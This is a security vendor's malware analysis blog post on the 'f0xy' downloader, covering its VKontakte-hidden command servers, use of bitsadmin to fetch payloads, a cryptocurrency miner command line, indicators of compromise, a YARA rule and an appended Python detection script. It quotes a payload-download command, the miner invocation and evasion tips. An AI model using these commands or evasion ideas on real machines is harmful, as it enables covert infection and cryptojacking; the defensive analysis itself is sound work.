January 29, 2015

New 'f0xy' malware is intelligent - employs cunning stealth & trickery

Nicholas Griffin, Security Researcher

Websense Security Labs have discovered a new and emerging malware downloader that employs evasion techniques and downloads a cryptocurrency miner. The new malware, which we have named 'f0xy', is able to dynamically change its command-and-control (C&C), and download and execute arbitrary files. More interestingly, f0xy's evasion tactics include leveraging the popular Russian social networking site VKontakte, and employing Microsoft's Background Intelligent Transfer Service to download files. 

The behavior of f0xy backs up our 2015 security predictions that cybercriminals will continue to hide their C2 infrastructure within legitimate websites. We believe that this will be a growing trend in 2015, as malware authors realize that detecting malicious intent on legitimate websites can be difficult for security vendors. 

Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the different stages of the attack detailed below: 

  • Stage 5 (Dropper) – ACE has detection for malicious files used in this campaign, including detection of the malicious behavior utilized by f0xy.
  • Stage 6 (Call Home) – ACE detects the communication to the C&C points associated with the f0xy downloader.

File Sandbox report for the f0xy downloader dropper file: http://csi.websense.com/ThreatScope/FileAnalysis?requestId=ddf3d016-d8ac-4220-969e-a42f002a0039

Hunting Down f0xy

When we took a closer look at the malware, we saw only 5/57 detections by security vendors for the initial dropper file f522e0893ec97438c6184e13adc48219f08b67d8.

Upon investigating the C&C infrastructure, further samples were found dating back to 13 January 2015. Analysis suggests that the malware author has been changing and improving the code for reliability and efficiency, and to arrive at a version that works on most operating systems. First versions of the malware will run only on Windows 6.0 (Vista) and above, while the newer versions will also run on Windows XP.

We decided to name the malware 'f0xy' due to the strings found in the executables, and the registry key it creates for persistence.

To date, we have not seen any evidence in our customer base of an attempt to infect a machine with f0xy. Websense Security Labs will continue to monitor the campaign, because we may see it targeting users in the near future.

Stealth & Evasion Tactics

Just as a real fox is known in many cultures for its cunning and trickery, so is the malware. There are three distinctive features that allow the malware to fly under the radar:

  1. The malware employs very little in the way of code and string obfuscation, in order to appear more legitimate and hide in plain sight. 
  2. A request is made to the Russian social networking site VKontakte, where the address of the real C&C is hidden.
  3. Finally, the malware uses Microsoft's Background Intelligent Transfer Service to outsource its network traffic, to avoid detection by security products.

While there is little in the way of obfuscation within the malware itself, we can see a base64 encoded string located in the midst of some HTTP strings:

Decoding the string results in a VKontakte user profile's 'wall' URL:


Executing the malware confirms that a request to this URL is made, with another base64 encoded string found as one of the comments on the user profile wall:


Decoding this one reveals the C&C URLs:


Analysis of subsequent network traffic and the behavior of the malware tells us that the <get> URL is responsible for obtaining an identifier to use for further requests, the <job> URL is responsible for asking the C&C what to do, and the <knock> URL is responsible for initially checking into the C&C, reporting information about the current environment where the malware is running, and optionally receiving a response back that tells it to download another version of the malware.

Leveraging the Microsoft Background Intelligent Transfer Service

The f0xy downloader calls upon bitsadmin.exe, the command-line tool for the Microsoft Background Intelligent Transfer Service (BITS), to download its payloads. BITS provides a way of using idle bandwidth to perform file transfers, so that the bandwidth requirements of other applications are not interrupted or interfered with. Many Windows services rely upon BITS, including Windows Update and Windows Defender.

The malware assigns the BITS job name "Download_f0xy" when performing these transfers, and specifies where to download the files:

bitsadmin /transfer Download_f0xy hxxp://" "C:\Documents and Settings\user\Application Data\Microsoft\f0xyupdate.exe"

Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable. However, this process could be made even more stealthy by interacting with BITS through its Component Object Model (COM) interface, instead of calling upon the executable directly.

Financial Motivation

Websense Security Labs have observed f0xy downloading a 64-bit version of the cryptocurrency miner CPUMiner. The miner is executed by f0xy with the following command line:

minerd -o stratum+tcp://EU.coinmine.pw:1111 -u sorted -p x

CoinMine.pw is a cryptocurrency mining service for multiple currencies, and allows a user to name 'workers' that can pool together to mine on behalf of a user's account. We can see from this command line that the worker name sorted is used, which presumably belongs to the malware actor distributing f0xy. The more machines infected by f0xy and mining under this worker name, the more potential cryptocurrency can be mined for the cybercriminal.

Indicators of Compromise

The following are indicators of a compromised machine:

Sample SHA1s

Network Traffic


File Names


Registry Keys

Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Name: f0xy


The following YARA rule can be used to hunt for more samples:

rule ws_f0xy_downloader {
    meta:
        description = "f0xy malware downloader"
        author = "Nick Griffin (Websense)"
    strings:
        $mz = "MZ"    // DOS header magic; this definition did not survive on the page, the standard "MZ" is assumed
        $string1 = "bitsadmin /transfer"
        $string2 = "del rm.bat"
    condition:
        ($mz at 0) and (all of ($string*))
}
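As an added example (not code from the original post or from Websense), the following Python triage helpers turn the indicators above into checks: one inspects process command lines for the bitsadmin /transfer and minerd invocations described in the BITS and Financial Motivation sections, and one reproduces the ws_f0xy_downloader YARA condition in pure Python. The sample command lines and the download URL are constructed placeholders, not values from the campaign.

```python
import re

# Indicators taken from the write-up: BITS job name, dropped file name, mining pool and worker.
F0XY_BITS_JOB = "Download_f0xy"
F0XY_DROP_NAME = "f0xyupdate.exe"
F0XY_POOL = "eu.coinmine.pw:1111"
F0XY_WORKER = "sorted"

# bitsadmin /transfer <job> <remote URL> <local path>; the local path may be quoted.
BITS_TRANSFER = re.compile(
    r'bitsadmin(?:\.exe)?\s+/transfer\s+(?P<job>\S+)\s+(?P<src>\S+)\s+(?P<dst>"[^"]+"|\S+)', re.I)
# minerd -o stratum+tcp://<pool> -u <worker> ...
MINER = re.compile(
    r'\bminerd(?:\.exe)?\b.*?-o\s+stratum\+tcp://(?P<pool>\S+).*?-u\s+(?P<worker>\S+)', re.I)


def triage_command_line(cmd: str) -> list:
    """Return a list of finding tags for one process command line (empty if nothing matched)."""
    findings = []
    m = BITS_TRANSFER.search(cmd)
    if m:
        job, dst = m.group("job"), m.group("dst").strip('"')
        # BITS writing an executable into a user profile directory is suspicious regardless of family.
        if dst.lower().endswith(".exe") and re.search(r"\\(application data|appdata)\\", dst, re.I):
            findings.append("bits-exe-drop-into-profile")
        if job == F0XY_BITS_JOB or dst.lower().endswith(F0XY_DROP_NAME):
            findings.append("f0xy-bits-job")
    m = MINER.search(cmd)
    if m:
        findings.append("stratum-miner")
        if m.group("pool").lower() == F0XY_POOL and m.group("worker") == F0XY_WORKER:
            findings.append("f0xy-miner-config")
    return findings


def matches_f0xy_yara(data: bytes) -> bool:
    """Same logic as the ws_f0xy_downloader rule: 'MZ' at offset 0 and both strings present."""
    return data[:2] == b"MZ" and b"bitsadmin /transfer" in data and b"del rm.bat" in data


# Constructed sample command lines (not real telemetry); the download URL is a placeholder.
SAMPLE_CMDS = [
    'bitsadmin /transfer Download_f0xy http://cnc.example.invalid/upd.exe '
    '"C:\\Documents and Settings\\user\\Application Data\\Microsoft\\f0xyupdate.exe"',
    "minerd -o stratum+tcp://EU.coinmine.pw:1111 -u sorted -p x",
    "bitsadmin /transfer WUpdate http://wu.example.invalid/a.cab C:\\Windows\\Temp\\a.cab",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDS:
        print(triage_command_line(cmd), "<-", cmd[:50])
```

The generic "bits-exe-drop-into-profile" tag fires on any BITS transfer of an executable into a profile directory, so it keeps value after the family-specific job and file names change.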



It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils. We also expect to see continued growth in malware authors migrating to legitimate and reputable websites to hide their malicious activities, and plenty more evasion tactics adopted as authors continue to subvert security products. We have configured our ThreatSeeker® Intelligence Cloud to look for more indicators of compromise, and we use tools like YARA to supplement our own analytics.

Blog author: Nick Griffin
